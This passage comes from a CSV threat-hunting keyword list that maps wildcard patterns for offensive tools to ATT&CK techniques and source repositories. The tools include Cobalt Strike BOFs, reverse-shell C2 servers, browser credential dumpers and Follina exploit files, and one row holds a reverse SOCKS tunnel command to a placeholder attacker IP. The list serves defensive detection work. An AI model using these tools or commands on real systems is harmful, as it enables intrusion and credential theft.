haven't been accessed for a period of time","T1070.004 - T1059 - T1047","TA0007 - TA0002 - TA0040","N/A","N/A","N/A","https://linux.die.net/man/8/tmpwatch","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*chrismaddalena/SharpCloud*","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","10","2","154","27","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z" +"*chrispetrou/HRShell*","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" +"*chrome* --headless * --dump-dom http*","greyware_tool_keyword","chromium","Headless Chromium allows running Chromium in a headless/server environment - downloading a file - abused by attackers","T1553.002 - T1059.005 - T1071.001 - T1561","TA0002","N/A","N/A","Defense Evasion","https://redcanary.com/blog/intelligence-insights-june-2023/","1","0","N/A","4","5","N/A","N/A","N/A","N/A" +"*chrome.exe* --load-extension=""*\Users\*\Appdata\Local\Temp\*","greyware_tool_keyword","chromium","The --load-extension switch allows the source to specify a target directory to load as an extension. This gives malware the opportunity to start a new browser window with their malicious extension loaded.","T1136.001 - T1176 - T1059.007","TA0003 - TA0004 - TA0005","N/A","N/A","Exploitation tools","https://www.mandiant.com/resources/blog/lnk-between-browsers","1","0","risk of false positives","7","10","N/A","N/A","N/A","N/A" +"*chrome_creds.txt*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" +"*chromecertbeggar.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*chromecertbeggar2.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*ChromeDump.git*","offensive_tool_keyword","chromedump","ChromeDump is a small tool to dump all JavaScript and other ressources going through the browser","T1059.007 - T1114.001 - T1518.001 - T1552.002","TA0005 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/g4l4drim/ChromeDump","1","1","N/A","N/A","1","54","1","2023-06-30T09:07:59Z","2023-01-26T20:44:06Z" +"*chromedump.py*","offensive_tool_keyword","chromedump","ChromeDump is a small tool to dump all JavaScript and other ressources going through the browser","T1059.007 - T1114.001 - T1518.001 - T1552.002","TA0005 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/g4l4drim/ChromeDump","1","1","N/A","N/A","1","54","1","2023-06-30T09:07:59Z","2023-01-26T20:44:06Z" +"*ChromeDump-main.zip*","offensive_tool_keyword","chromedump","ChromeDump is a small tool to dump all JavaScript and other ressources going through the browser","T1059.007 - T1114.001 - T1518.001 - T1552.002","TA0005 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/g4l4drim/ChromeDump","1","1","N/A","N/A","1","54","1","2023-06-30T09:07:59Z","2023-01-26T20:44:06Z" +"*chromeKey.x64*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*chromeKey.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*chromepass.exe*","offensive_tool_keyword","chromepass","ChromePass is a small password recovery tool for Windows that allows you to view the user names and passwords stored by Google Chrome Web browser. For each password entry. the following information is displayed: Origin URL. Action URL. User Name Field. Password Field. User Name. Password. and Created Time. It allows you to get the passwords from your current running system. or from a user profile stored on external drive.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/chromepass.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*chromepass.zip*","offensive_tool_keyword","chromepass","ChromePass is a small password recovery tool for Windows that allows you to view the user names and passwords stored by Google Chrome Web browser. For each password entry. the following information is displayed: Origin URL. Action URL. User Name Field. Password Field. User Name. Password. and Created Time. It allows you to get the passwords from your current running system. or from a user profile stored on external drive.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/chromepass.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*chromiumkeydump *","offensive_tool_keyword","bof-collection","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/crypt0p3g/bof-collection","1","0","N/A","N/A","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" +"*chromiumkeydump*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","1","N/A","10","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" +"*ChromiumKeyDump.cna*","offensive_tool_keyword","bof-collection","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/crypt0p3g/bof-collection","1","1","N/A","N/A","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" +"*ChromiumKeyDump.cpp*","offensive_tool_keyword","bof-collection","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/crypt0p3g/bof-collection","1","1","N/A","N/A","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" +"*ChromiumKeyDump.exe*","offensive_tool_keyword","bof-collection","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/crypt0p3g/bof-collection","1","1","N/A","N/A","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" +"*Chudry/Xerror*","offensive_tool_keyword","Xerror","fully automated pentesting tool","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Chudry/Xerror","1","1","N/A","N/A","5","458","106","2022-12-08T04:33:03Z","2019-08-16T21:20:52Z" +"*chunlie.exe*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*cHux014r17SG3v4gPUrZ0BZjDabMTY2eWDj1tuYdREBg*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*chvancooten/nimbuild*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*chvancooten/NimPlant*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*CIMplant.exe *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","1","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" +"*CIMplant.sln*","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","1","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" +"*CIMplant-main*","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","1","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" +"*cirt-default-usernames.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cirt-fuzzer*","offensive_tool_keyword","cirt-fuzzer","A simple TCP/UDP protocol fuzzer.","T1046 - T1065 - T1190 - T1219 - T1221 - T1497","TA0001 - TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Sniffing & Spoofing","https://www.ecrimelabs.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*cisco2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*cisco-phone-query.sh*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","1","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" +"*ckiahbcmlmkpfiijecbpflfahoimklke*","greyware_tool_keyword","Gom VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*Cleanup-57BFF48E-24FB-48E9-A390-AC62ADF38B07.json*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" +"*clear_cmd","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" +"*clear_command_history.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*ClearEventlog.vbs*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" +"*Clearlogs*","signature_keyword","Antivirus Signature","Antivirus signature_keyword for hacktool clearing logs","N/A","N/A","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Clear-RecycleBin -Force -ErrorAction SilentlyContinue*","greyware_tool_keyword","powershell","Deletes contents of recycle bin","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*clem9669_wordlist_medium.7z*","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","2","192","44","2023-10-04T14:27:37Z","2020-10-21T14:37:53Z" +"*clem9669_wordlist_small.7z*","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","2","192","44","2023-10-04T14:27:37Z","2020-10-21T14:37:53Z" +"*-cli install github *","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*-cli install github *Apollo.*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*-cli payload start *","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*click_to_exploit.docx*","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/drgreenthumb93/CVE-2022-30190-follina","1","1","N/A","N/A","1","10","4","2023-04-20T20:34:05Z","2022-06-01T11:37:08Z" +"*clickjack_attack.html*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*clickjack_victim.html*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*clickme*exploit.html*","offensive_tool_keyword","POC","CVE-2022-30190 Follina POC","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/onecloudemoji/CVE-2022-30190","1","1","N/A","N/A","2","107","33","2022-05-31T09:35:37Z","2022-05-31T06:45:25Z" +"*client $ATTACKER-IP:$ATTACKER-PORT R:$PORT:socks*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*client.py --server-ip * --server-port *","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","0","N/A","10","10","490","125","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z" +"*client.py*--domain*--hashes*","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","0","N/A","10","10","490","125","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z" +"*ClipboardImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*clipboardinject.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*clipboardinject.x64*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*clipboardinject.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*clipboard-monitor *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*ClipboardWindow-Inject*","offensive_tool_keyword","cobaltstrike","CLIPBRDWNDCLASS process injection technique(BOF) - execute beacon shellcode in callback","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 